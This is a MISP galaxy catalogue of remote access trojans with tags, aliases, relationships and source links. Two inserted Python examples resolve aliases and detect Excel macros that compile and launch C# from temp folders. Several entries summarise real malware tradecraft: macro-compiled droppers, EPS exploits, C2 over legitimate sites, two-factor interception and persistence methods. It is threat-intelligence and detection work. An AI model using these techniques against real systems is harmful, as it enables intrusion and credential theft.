The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits. This RAT builder caught our attention as it was being offered for free and had a lot of similarities to the njRAT/H-Worm family.

The tag is: misp-galaxy:rat="Cobian RAT"

Cobian RAT has relationships with:

  • similar: misp-galaxy:malpedia="Cobian RAT" with estimative-language:likelihood-probability="likely"

Table 8729. Table References

Links

https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

Netsupport Manager

NetSupport Manager continues to deliver the very latest in remote access, PC support and desktop management capabilities. From a desktop, laptop, tablet or smartphone, monitor multiple systems in a single action, deliver hands-on remote support, collaborate and even record or play back sessions. When needed, gather real-time hardware and software inventory, monitor services and even view system config remotely to help resolve issues quickly.

The tag is: misp-galaxy:rat="Netsupport Manager"

Table 8730. Table References

Links

http://www.netsupportmanager.com/index.asp

Vortex

The tag is: misp-galaxy:rat="Vortex"

Assassin

The tag is: misp-galaxy:rat="Assassin"

Net Devil

The tag is: misp-galaxy:rat="Net Devil"

Net Devil is also known as:

  • NetDevil

Net Devil has relationships with:

  • similar: misp-galaxy:rat="NetDevil" with estimative-language:likelihood-probability="likely"

Table 8731. Table References

Links

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20702
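The NetDevil and Net Devil entries above are one family listed twice, tied together only by a synonym and a pair of "similar" relationships, and the same happens throughout this galaxy (Kiler RAT / Njw0rm, Seecreen / Firnass). The following is an added example, not code from the MISP project, showing how to resolve a free-text malware name to the right `misp-galaxy:rat="..."` tag and follow the "similar" links. SAMPLE_CLUSTER is constructed for this example and mirrors those entries; its field names (values, value, uuid, meta.synonyms, related[].dest-uuid / type / tags) follow the MISP galaxy cluster JSON layout as this example's author understands it, and the UUIDs are made up.

```python
"""Resolve RAT names, aliases and 'similar' links to MISP galaxy tags.

Added example, not code from the MISP project. SAMPLE_CLUSTER is constructed
for this example; field names are assumed to follow the galaxy cluster JSON
layout and the UUIDs are made up.
"""
import json
import re

SAMPLE_CLUSTER = json.loads(r'''
{
  "name": "RAT",
  "type": "rat",
  "values": [
    {"value": "NetDevil", "uuid": "00000000-0000-4000-8000-000000000001",
     "description": "Backdoor.NetDevil allows a hacker to remotely control an infected computer.",
     "related": [{"dest-uuid": "00000000-0000-4000-8000-000000000002", "type": "similar",
                  "tags": ["estimative-language:likelihood-probability=\"likely\""]}]},
    {"value": "Net Devil", "uuid": "00000000-0000-4000-8000-000000000002",
     "meta": {"synonyms": ["NetDevil"]},
     "related": [{"dest-uuid": "00000000-0000-4000-8000-000000000001", "type": "similar",
                  "tags": ["estimative-language:likelihood-probability=\"likely\""]},
                 {"dest-uuid": "00000000-0000-4000-8000-0000000000ff", "type": "similar",
                  "tags": []}]},
    {"value": "Kiler RAT", "uuid": "00000000-0000-4000-8000-000000000003",
     "meta": {"synonyms": ["Njw0rm"]}},
    {"value": "Seecreen", "uuid": "00000000-0000-4000-8000-000000000004",
     "meta": {"synonyms": ["Firnass"]}}
  ]
}
''')

TAG_RE = re.compile(r'^misp-galaxy:([a-z0-9-]+)="(.+)"$')


def tag_for(cluster_type, value):
    """Render the tag MISP attaches for one cluster value."""
    return f'misp-galaxy:{cluster_type}="{value}"'


def parse_tag(tag):
    """Inverse of tag_for: split a galaxy tag into (cluster type, value)."""
    m = TAG_RE.match(tag)
    if not m:
        raise ValueError(f"not a misp-galaxy tag: {tag!r}")
    return m.group(1), m.group(2)


def _norm(name):
    # Vendors differ in case, spacing and punctuation ("Net Devil" vs "NetDevil"),
    # so compare on lowercase alphanumerics only.
    return re.sub(r"[^a-z0-9]", "", name.lower())


def build_alias_index(cluster):
    """Map each normalised value or synonym to the canonical values it names."""
    index = {}
    for entry in cluster["values"]:
        names = [entry["value"]] + entry.get("meta", {}).get("synonyms", [])
        for name in names:
            index.setdefault(_norm(name), set()).add(entry["value"])
    return index


def resolve(cluster, name):
    """Sorted tags a free-text name may refer to; [] if unknown.

    More than one result means the galaxy itself carries duplicates (as with
    NetDevil / Net Devil), so the caller must choose or apply both tags.
    """
    index = build_alias_index(cluster)
    return sorted(tag_for(cluster["type"], v) for v in index.get(_norm(name), ()))


def similar_tags(cluster, value):
    """(tag, likelihood) for each 'similar' relationship of one entry.

    Likelihood comes from the estimative-language tag on the relationship
    (None if absent). A dest-uuid that is not in this cluster belongs to
    another galaxy file and is reported as tag None rather than guessed.
    """
    by_uuid = {e["uuid"]: e for e in cluster["values"]}
    entry = next(e for e in cluster["values"] if e["value"] == value)
    out = []
    for rel in entry.get("related", []):
        if rel.get("type") != "similar":
            continue
        likelihood = None
        for t in rel.get("tags", []):
            m = re.search(r'likelihood-probability="([^"]+)"', t)
            if m:
                likelihood = m.group(1)
        dest = by_uuid.get(rel["dest-uuid"])
        out.append((tag_for(cluster["type"], dest["value"]) if dest else None, likelihood))
    return out


if __name__ == "__main__":
    for name in ("Njw0rm", "net devil", "Firnass", "Bandook"):
        print(name, "->", resolve(SAMPLE_CLUSTER, name))
    print(similar_tags(SAMPLE_CLUSTER, "Net Devil"))
```

When wiring this into an ingestion pipeline, treat an ambiguous `resolve()` result as a data-quality signal rather than silently picking the first tag: the duplicate pair is exactly what the "similar" relationship exists to record, and tagging with both keeps correlation with either vendor's naming intact.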

A4Zeta

The tag is: misp-galaxy:rat="A4Zeta"

Table 8732. Table References

Links

http://www.megasecurity.org/trojans/a/a4zeta/A4zeta_b2.html

Greek Hackers RAT

The tag is: misp-galaxy:rat="Greek Hackers RAT"

Table 8733. Table References

Links

http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0

MRA RAT

The tag is: misp-galaxy:rat="MRA RAT"

Table 8734. Table References

Links

http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0

Sparta RAT

The tag is: misp-galaxy:rat="Sparta RAT"

Table 8735. Table References

Links

http://www.connect-trojan.net/2015/09/sparta-rat-1.2-by-azooz-ejram.html

LokiTech

The tag is: misp-galaxy:rat="LokiTech"

MadRAT

The tag is: misp-galaxy:rat="MadRAT"

Tequila Bandita

The tag is: misp-galaxy:rat="Tequila Bandita"

Table 8736. Table References

Links

http://www.connect-trojan.net/2013/07/tequila-bandita-1.3b2.html

Toquito Bandito

The tag is: misp-galaxy:rat="Toquito Bandito"

Table 8737. Table References

Links

http://www.megasecurity.org/trojans/t/toquitobandito/Toquitobandito_all.html

Hav-RAT

Written in Delphi

The tag is: misp-galaxy:rat="Hav-RAT"

Table 8739. Table References

Links

http://www.megasecurity.org/trojans/h/hav/Havrat1.2.html

ComRAT

ComRAT is a remote access tool suspected of being a descendant of Agent.btz and used by Turla.

The tag is: misp-galaxy:rat="ComRAT"

ComRAT has relationships with:

  • similar: misp-galaxy:mitre-malware="ComRAT - S0126" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Agent.BTZ" with estimative-language:likelihood-probability="likely"

Table 8740. Table References

Links

https://attack.mitre.org/wiki/Software/S0126

4H RAT

4H RAT is malware that has been used by Putter Panda since at least 2007.

The tag is: misp-galaxy:rat="4H RAT"

4H RAT has relationships with:

  • similar: misp-galaxy:mitre-malware="4H RAT - S0065" with estimative-language:likelihood-probability="likely"

Table 8741. Table References

Links

https://attack.mitre.org/wiki/Software/S0065

Darknet RAT

The tag is: misp-galaxy:rat="Darknet RAT"

Darknet RAT is also known as:

  • Dark NET RAT

Table 8742. Table References

Links

http://www.connect-trojan.net/2015/06/dark-net-rat-v.0.3.9.0.html

CIA RAT

The tag is: misp-galaxy:rat="CIA RAT"

Minimo

The tag is: misp-galaxy:rat="Minimo"

miniRAT

The tag is: misp-galaxy:rat="miniRAT"

Pain RAT

The tag is: misp-galaxy:rat="Pain RAT"

PlugX

PLUGX is a remote access tool (RAT) used in targeted attacks aimed toward government-related institutions and key industries. It was utilized the same way as Poison Ivy, a RAT involved in a campaign dating back to 2008.

The tag is: misp-galaxy:rat="PlugX"

PlugX is also known as:

  • Korplug

  • SOGU

  • Scontroller

PlugX has relationships with:

  • similar: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

Table 8743. Table References

Links

https://www.lastline.com/labsblog/an-analysis-of-plugx-malware/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PLUGX

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf

UNITEDRAKE

The existence of the UNITEDRAKE RAT first came to light in 2014 as part of a series of classified documents leaked by former NSA contractor Edward Snowden.

The tag is: misp-galaxy:rat="UNITEDRAKE"

Table 8744. Table References

Links

http://thehackernews.com/2017/09/shadowbrokers-unitedrake-hacking.html

https://www.itnews.com.au/news/shadowbrokers-release-unitedrake-nsa-malware-472771

MegaTrojan

Written in Visual Basic

The tag is: misp-galaxy:rat="MegaTrojan"

Table 8745. Table References

Links

http://www.megasecurity.org/trojans/m/mega/Megatrojan1.0.html

Venomous Ivy

The tag is: misp-galaxy:rat="Venomous Ivy"

Xploit

The tag is: misp-galaxy:rat="Xploit"

Arctic R.A.T.

The tag is: misp-galaxy:rat="Arctic R.A.T."

Arctic R.A.T. is also known as:

  • Artic

Table 8746. Table References

Links

http://anti-virus-soft.com/threats/artic

GOlden Phoenix

The tag is: misp-galaxy:rat="GOlden Phoenix"

Table 8747. Table References

Links

http://www.connect-trojan.net/2014/02/golden-phoenix-rat-0.2.html

GraphicBooting

The tag is: misp-galaxy:rat="GraphicBooting"

Table 8748. Table References

Links

http://www.connect-trojan.net/2014/10/graphicbooting-rat-v0.1-beta.html?m=0

Pocket RAT

The tag is: misp-galaxy:rat="Pocket RAT"

Erebus

The tag is: misp-galaxy:rat="Erebus"

Erebus has relationships with:

  • similar: misp-galaxy:malpedia="Erebus (ELF)" with estimative-language:likelihood-probability="likely"

VorteX

The tag is: misp-galaxy:rat="VorteX"

Archelaus Beta

The tag is: misp-galaxy:rat="Archelaus Beta"

Table 8750. Table References

Links

http://www.connect-trojan.net/2014/02/archelaus-rat-beta.html

BlackHole

C# RAT (Remote Administration Tool) - Educational purposes only

The tag is: misp-galaxy:rat="BlackHole"

BlackHole has relationships with:

  • similar: misp-galaxy:exploit-kit="BlackHole" with estimative-language:likelihood-probability="likely"

Table 8751. Table References

Links

https://github.com/hussein-aitlahcen/BlackHole

Vanguard

The tag is: misp-galaxy:rat="Vanguard"

Table 8752. Table References

Links

http://ktwox7.blogspot.lu/2010/12/vanguard-remote-administration.html

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

The tag is: misp-galaxy:rat="FINSPY"

FINSPY has relationships with:

  • similar: misp-galaxy:tool="FINSPY" with estimative-language:likelihood-probability="likely"

Table 8754. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html

Seed RAT

Seed is a firewall-bypassing trojan that injects into the default browser. Its purpose is simple: to be compact (4 KB server size) and useful while uploading bigger, full-featured trojans, or even making Seed download them from somewhere. It provides computer info, a process manager and a file manager (download, create folder, delete, execute and upload), plus a remote download function, all behind an easy-to-use interface that resembles an instant messenger.

The tag is: misp-galaxy:rat="Seed RAT"

Table 8755. Table References

Links

http://www.nuclearwintercrew.com/Products-View/25/Seed_1.1/

SharpBot

The tag is: misp-galaxy:rat="SharpBot"

TorCT PHP RAT

The tag is: misp-galaxy:rat="TorCT PHP RAT"

Table 8756. Table References

Links

https://github.com/alienwithin/torCT-PHP-RAT

A32s RAT

The tag is: misp-galaxy:rat="A32s RAT"

Char0n

The tag is: misp-galaxy:rat="Char0n"

Nytro

The tag is: misp-galaxy:rat="Nytro"

Syla

The tag is: misp-galaxy:rat="Syla"

Table 8757. Table References

Links

http://www.connect-trojan.net/2013/07/syla-rat-0.3.html

Cobalt Strike

Cobalt Strike is software for Adversary Simulations and Red Team Operations.

The tag is: misp-galaxy:rat="Cobalt Strike"

Cobalt Strike has relationships with:

  • similar: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 8758. Table References

Links

https://www.cobaltstrike.com/

Sakula

The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015. Sakula enables an adversary to run interactive commands as well as to download and execute additional components.

The tag is: misp-galaxy:rat="Sakula"

Sakula is also known as:

  • Sakurel

  • VIPER

Sakula has relationships with:

  • similar: misp-galaxy:mitre-malware="Sakula - S0074" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Sakula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"

Table 8759. Table References

Links

https://www.secureworks.com/research/sakula-malware-family

hcdLoader

hcdLoader is a remote access tool (RAT) that has been used by APT18.

The tag is: misp-galaxy:rat="hcdLoader"

hcdLoader has relationships with:

  • similar: misp-galaxy:mitre-malware="hcdLoader - S0071" with estimative-language:likelihood-probability="likely"

Table 8760. Table References

Links

https://attack.mitre.org/wiki/Software/S0071

Crimson

The tag is: misp-galaxy:rat="Crimson"

Crimson has relationships with:

  • similar: misp-galaxy:mitre-malware="Crimson - S0115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

Table 8761. Table References

Links

http://www.connect-trojan.net/2015/01/crimson-rat-3.0.0.html

KjW0rm

The tag is: misp-galaxy:rat="KjW0rm"

KjW0rm has relationships with:

  • similar: misp-galaxy:tool="KjW0rm" with estimative-language:likelihood-probability="likely"

Table 8762. Table References

Links

http://hack-defender.blogspot.fr/2015/12/kjw0rm-v05x.html

Ghost

The tag is: misp-galaxy:rat="Ghost"

Ghost is also known as:

  • Ucul

Table 8763. Table References

Links

https://www.youtube.com/watch?v=xXZW4ajVYkI

9002

The tag is: misp-galaxy:rat="9002"

Sandro RAT

The tag is: misp-galaxy:rat="Sandro RAT"

Mega

The tag is: misp-galaxy:rat="Mega"

WiRAT

The tag is: misp-galaxy:rat="WiRAT"

3PARA RAT

The tag is: misp-galaxy:rat="3PARA RAT"

3PARA RAT has relationships with:

  • similar: misp-galaxy:mitre-malware="3PARA RAT - S0066" with estimative-language:likelihood-probability="likely"

Table 8764. Table References

Links

https://books.google.fr/books?isbn=2212290136

BBS RAT

The tag is: misp-galaxy:rat="BBS RAT"

Konni

KONNI is a remote access Trojan (RAT) that was first reported in May 2017, but is believed to have been in use for over 3 years. As part of our daily threat monitoring, FortiGuard Labs came across a new variant of the KONNI RAT and decided to take a deeper look.

The tag is: misp-galaxy:rat="Konni"

Konni is also known as:

  • KONNI

Konni has relationships with:

  • similar: misp-galaxy:tool="KONNI" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Konni" with estimative-language:likelihood-probability="likely"

Table 8765. Table References

Links

https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant

https://www.cylance.com/en_us/blog/threat-spotlight-konni-stealthy-remote-access-trojan.html

https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/

http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

Felismus RAT

Used by Sowbug

The tag is: misp-galaxy:rat="Felismus RAT"

Table 8766. Table References

Links

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

Xsser

Xsser mRAT is a piece of malware that targets iOS devices that have software limitations removed. The app is installed via a rogue repository on Cydia, the most popular third-party application store for jailbroken iPhones. Once the malicious bundle has been installed and executed, it gains persistence - preventing the user from deleting it. The mRAT then makes server-side checks and proceeds to steal data from the user’s device and executes remote commands as directed by its command-and-control (C2) server.

The tag is: misp-galaxy:rat="Xsser"

Xsser is also known as:

  • mRAT

Table 8767. Table References

Links

https://blogs.akamai.com/2014/12/ios-and-android-os-targeted-by-man-in-the-middle-attacks.html

http://malware.wikia.com/wiki/Xsser_mRAT

GovRAT

GovRAT is an old cyberespionage tool, it has been in the wild since 2014 and it was used by various threat actors across the years.

The tag is: misp-galaxy:rat="GovRAT"

GovRAT has relationships with:

  • similar: misp-galaxy:malpedia="GovRAT" with estimative-language:likelihood-probability="likely"

Table 8768. Table References

Links

http://securityaffairs.co/wordpress/41714/cyber-crime/govrat-platform.html

http://securityaffairs.co/wordpress/51202/cyber-crime/govrat-2-0-attacks.html

Rottie3

The tag is: misp-galaxy:rat="Rottie3"

Table 8769. Table References

Links

https://www.youtube.com/watch?v=jUg5--68Iqs

Killer RAT

The tag is: misp-galaxy:rat="Killer RAT"

Hi-Zor

The tag is: misp-galaxy:rat="Hi-Zor"

Hi-Zor has relationships with:

  • similar: misp-galaxy:mitre-malware="Hi-Zor - S0087" with estimative-language:likelihood-probability="likely"

Table 8770. Table References

Links

https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat

Quaverse

Quaverse RAT or QRAT is a fairly new Remote Access Tool (RAT) introduced in May 2015. This RAT is marketed as an undetectable Java RAT. As you might expect from a RAT, the tool is capable of grabbing passwords, key logging and browsing files on the victim’s computer. On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.

The tag is: misp-galaxy:rat="Quaverse"

Quaverse is also known as:

  • QRAT

Table 8771. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/

Heseber

The tag is: misp-galaxy:rat="Heseber"

Cardinal

Cardinal is a remote access trojan (RAT) discovered by Palo Alto Networks in 2017 that had been active for over two years. It is delivered via a downloader, known as Carp, which uses malicious macros in Microsoft Excel documents to compile embedded C# source code into an executable that runs and deploys the Cardinal RAT. The malicious Excel files use different tactics to get the victims to execute them.

The tag is: misp-galaxy:rat="Cardinal"

Cardinal has relationships with:

  • similar: misp-galaxy:tool="EVILNUM" with estimative-language:likelihood-probability="likely"

Table 8772. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

https://www.scmagazine.com/cardinal-rats-unique-downloader-allowed-it-to-avoid-detection-for-years/article/651927/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/cardinal

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/
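The delivery chain described above (an Excel macro compiling embedded C# into an executable and then running it) leaves a distinctive process tree: an Office application as the parent of the .NET command-line compiler, followed by the same Office process launching a binary from a user-writable directory. The following is an added example, not code from Palo Alto Networks or the MISP project, that applies that check to process-creation events. EVENTS is constructed telemetry in a simplified, Sysmon-like shape; the field names pid, image, parent_image and command_line are this example's own, not a vendor schema.

```python
"""Flag Office processes that compile and launch code at runtime.

Added example, not vendor or MISP code. EVENTS is constructed sample
telemetry; the field names are this example's own.
"""
from pathlib import PureWindowsPath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
NET_COMPILERS = {"csc.exe", "vbc.exe"}   # .NET Framework command-line compilers
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")

EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
CSC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

EVENTS = [  # constructed sample telemetry
    {"pid": 1001, "image": EXCEL, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"EXCEL.EXE" C:\Users\a\Downloads\invoice.xls'},
    # Macro hands embedded C# to csc.exe and writes the result under %TEMP%.
    {"pid": 1002, "image": CSC, "parent_image": EXCEL,
     "command_line": r"csc.exe /noconfig /out:C:\Users\a\AppData\Local\Temp\upd.exe C:\Users\a\AppData\Local\Temp\upd.cs"},
    # The freshly compiled binary is launched by Excel.
    {"pid": 1003, "image": r"C:\Users\a\AppData\Local\Temp\upd.exe", "parent_image": EXCEL,
     "command_line": r"C:\Users\a\AppData\Local\Temp\upd.exe"},
    # Benign: a developer build invoking the same compiler from MSBuild.
    {"pid": 2001, "image": CSC,
     "parent_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "command_line": r"csc.exe /noconfig @C:\src\app\obj\Release\app.rsp"},
]


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def detect(events):
    """Return (pid, rule) pairs for events matching the compile-and-run pattern."""
    findings = []
    for ev in events:
        if _base(ev["parent_image"]) not in OFFICE_APPS:
            continue  # csc.exe under MSBuild or Visual Studio is ordinary activity
        image = _base(ev["image"])
        if image in NET_COMPILERS:
            findings.append((ev["pid"], "office_spawned_dotnet_compiler"))
        elif any(d in ev["image"].lower() for d in USER_WRITABLE):
            findings.append((ev["pid"], "office_launched_exe_from_user_writable_path"))
    return findings


def compiled_outputs(events):
    """Collect /out: paths from compiler command lines so responders know which binary to grab."""
    outs = []
    for ev in events:
        if _base(ev["image"]) in NET_COMPILERS:
            for tok in ev["command_line"].split():
                if tok.lower().startswith("/out:"):
                    outs.append(tok[len("/out:"):])
    return outs


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
    print("compiled:", compiled_outputs(EVENTS))
```

Keying on the parent process rather than on csc.exe alone is what keeps the rule quiet on developer workstations, where the compiler runs constantly under MSBuild; the second rule catches the execution stage even when the compiler invocation itself is missed or renamed.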

OmniRAT

Works on all Android, Windows, Linux and Mac devices!

The tag is: misp-galaxy:rat="OmniRAT"

OmniRAT has relationships with:

  • similar: misp-galaxy:malpedia="OmniRAT" with estimative-language:likelihood-probability="likely"

Table 8773. Table References

Links

https://omnirat.eu/en/

Jfect

The tag is: misp-galaxy:rat="Jfect"

Table 8774. Table References

Links

https://www.youtube.com/watch?v=qKdoExQFb68

Trochilus

Trochilus is a remote access trojan (RAT) first identified in October 2015 when attackers used it to infect visitors of a Myanmar website. It was then used in a 2016 cyber-espionage campaign, dubbed "the Seven Pointed Dagger," managed by another group, "Group 27," who also uses the PlugX trojan. Trochilus is primarily spread via emails with a malicious .RAR attachment containing the malware. The trojan’s functionality includes a shellcode extension, remote uninstall, a file manager, and the ability to download and execute, upload and execute, and access the system information. Once present on a system, Trochilus can move laterally in the network for better access. This trojan operates in memory only and does not write to the disk, helping it evade detection.

The tag is: misp-galaxy:rat="Trochilus"

Trochilus has relationships with:

  • similar: misp-galaxy:tool="Trochilus" with estimative-language:likelihood-probability="likely"

Table 8775. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

http://securityaffairs.co/wordpress/43889/cyber-crime/new-rat-trochilus.html

Matryoshka

The CopyKittens group's most commonly used initial attack vector is a simple, yet alarmingly effective, spearphishing attack, infecting unsuspecting victims via a malicious email attachment (usually an executable that has been disguised as something else). From there, Matryoshka runs second-stage malware via a dropper and covertly installs a Remote Access Toolkit (RAT). This is done using a reflective loader technique that allows the malware to run in process memory, rather than being written to disk. This not only hides the installation of the RAT but also ensures that the RAT will be "reinstalled" after a system restart.

The tag is: misp-galaxy:rat="Matryoshka"

Matryoshka has relationships with:

  • similar: misp-galaxy:tool="Matryoshka" with estimative-language:likelihood-probability="likely"

Table 8776. Table References

Links

https://www.alienvault.com/blogs/security-essentials/matryoshka-malware-from-copykittens-group

Mangit

First discovered by Trend Micro in June, Mangit is a new malware family being marketed on both the Dark web and open internet. Users have the option to rent the trojan’s infrastructure for about $600 per 10-day period or buy the source code for about $8,800. Mangit was allegedly developed by "Ric", a Brazilian hacker, who makes himself available via Skype to discuss rental agreements. Once the malware is rented or purchased, the user controls a portion of the Mangit botnet, the trojan, the dropper, an auto-update system, and the server infrastructure to run their attacks. Mangit contains support for nine Brazilian banks including Citibank, HSBC, and Santander. The malware can also be used to steal user PayPal credentials. Mangit has the capability to collect banking credentials, receive SMS texts when a victim is accessing their bank account, and take over victims’ browsers. To circumvent two-factor authentication, attackers can use Mangit to lock victims’ browsers and push pop-ups to the victim asking for the verification code they just received.

The tag is: misp-galaxy:rat="Mangit"

Table 8777. Table References

Links

http://virusguides.com/newly-discovered-mangit-malware-offers-banking-trojan-service/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/mangit

http://news.softpedia.com/news/new-malware-mangit-surfaces-as-banking-trojan-as-a-service-505458.shtml

Revenge-RAT

Revenge v0.1 was a simple tool, according to a researcher known as Rui, who says the malware’s author didn’t bother obfuscating the RAT’s source code. This raised a question mark with the researchers, who couldn’t explain why VirusTotal scanners couldn’t pick it up as a threat right away. Revenge, which was written in Visual Basic, also didn’t feature too many working features compared to similar RATs. Even Napoleon admitted that his tool was still in the early development stages, a reason why he provided the RAT for free.

The tag is: misp-galaxy:rat="Revenge-RAT"

Table 8779. Table References

Links

http://www.securitynewspaper.com/2016/08/31/unsophisticated-revenge-rat-released-online-free-exclusive/

vjw0rm 0.1

“Vengeance Justice Worm” was first discovered in 2016 and is a highly multifunctional, modular, publicly available “commodity malware”, i.e., it can be purchased by those interested through various cybercrime and hacking related forums and channels.

VJwOrm is a JavaScript-based malware and combines characteristics of Worm, Information Stealer, Remote-Access Trojan (RAT), Denial-of-Service (DOS) malware, and spam-bot.

VJw0rm is propagated primarily by malicious email attachments and by infecting removable storage devices.

Once executed by the victim, the very heavily obfuscated VJw0rm will enumerate installed drives and, if a removable drive is found, VJw0rm will infect it if configured to do so.

It will continue to gather victim information such as operating system details, user’s details, installed anti-virus product details, stored browser cookies, the presence of vbc.exe on the system (Microsoft’s .NET Visual Basic Compiler, this indicates that .NET is installed on the system and can affect the actor’s choice of additional malware delivery), and whether the system has been previously infected.

VJw0rm will then report this information back to its command-and-control server and await further commands, such as downloading and executing additional malware or employing any of its other numerous capabilities.

Finally, VJw0rm establishes persistence in the form of registry auto-runs, system startup folders, a scheduled task, or any combination of these methods.

The tag is: misp-galaxy:rat="vjw0rm 0.1"

vjw0rm 0.1 is also known as:

  • Vengeance Justice Worm

  • VJw0rm

  • VJwOrm

Table 8780. Table References

Links

https://twitter.com/malwrhunterteam/status/816993165119016960?lang=en

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

rokrat

ROKRAT is a remote access trojan (RAT) that leverages a malicious Hangul Word Processor (HWP) document sent in spearphishing emails to infect hosts. The HWP document contains an embedded Encapsulated PostScript (EPS) object. The object exploits an EPS buffer overflow vulnerability and downloads a binary disguised as a .JPG file. The file is then decoded and the ROKRAT executable is initiated. The trojan uses legitimate Twitter, Yandex, and Mediafire websites for its command and control communications and exfiltration platforms, making them difficult to block globally. Additionally, the platforms use HTTPS connections, making it more difficult to gather additional data on its activities. Cisco’s Talos Group identified two email campaigns. In one, attackers send potential victims emails from an email server of a private university in Seoul, South Korea with a sender email address of "kgf2016@yonsei.ac.kr," the contact email for the Korea Global Forum, adding a sense of legitimacy to the email. It is likely that the email address was compromised and used by the attackers in this campaign. The second is less sophisticated and sends emails claiming to be from a free Korean mail service with the subject line "Request Help" and the attached malicious HWP filename "I’m a munchon person in Gangwon-do, North Korea." The ROKRAT developer uses several techniques to hinder analysis, including identifying tools usually used by malware analysts or within sandbox environments. Once it has infected a device, this trojan can execute commands, move a file, remove a file, kill a process, download and execute a file, upload documents, capture screenshots, and log keystrokes. Researchers believe the developer is a native Korean speaker and the campaign is currently targeting Korean speakers.

The tag is: misp-galaxy:rat="rokrat"

rokrat is also known as:

  • ROKRAT

Table 8781. Table References

Links

http://blog.talosintelligence.com/2017/04/introducing-rokrat.html

http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

Qarallax

Travelers applying for a US Visa in Switzerland were recently targeted by cyber-criminals linked to a malware called QRAT. Twitter user @hkashfi posted a Tweet saying that one of his friends received a file (US Travel Docs Information.jar) from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland (notice the “i” between “travel” and “docs”).

The tag is: misp-galaxy:rat="Qarallax"

Qarallax is also known as:

  • qrat

Qarallax has relationships with:

  • similar: misp-galaxy:tool="qrat" with estimative-language:likelihood-probability="likely"

Table 8782. Table References

Links

https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/

MoonWind

MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.

The tag is: misp-galaxy:rat="MoonWind"

MoonWind has relationships with:

  • similar: misp-galaxy:mitre-malware="MoonWind - S0149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"

Table 8783. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

https://attack.mitre.org/wiki/Software/S0149

Remcos

Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.

The tag is: misp-galaxy:rat="Remcos"

Remcos has relationships with:

  • similar: misp-galaxy:malpedia="Remcos" with estimative-language:likelihood-probability="likely"

Table 8784. Table References

Links

https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

Client Maximus

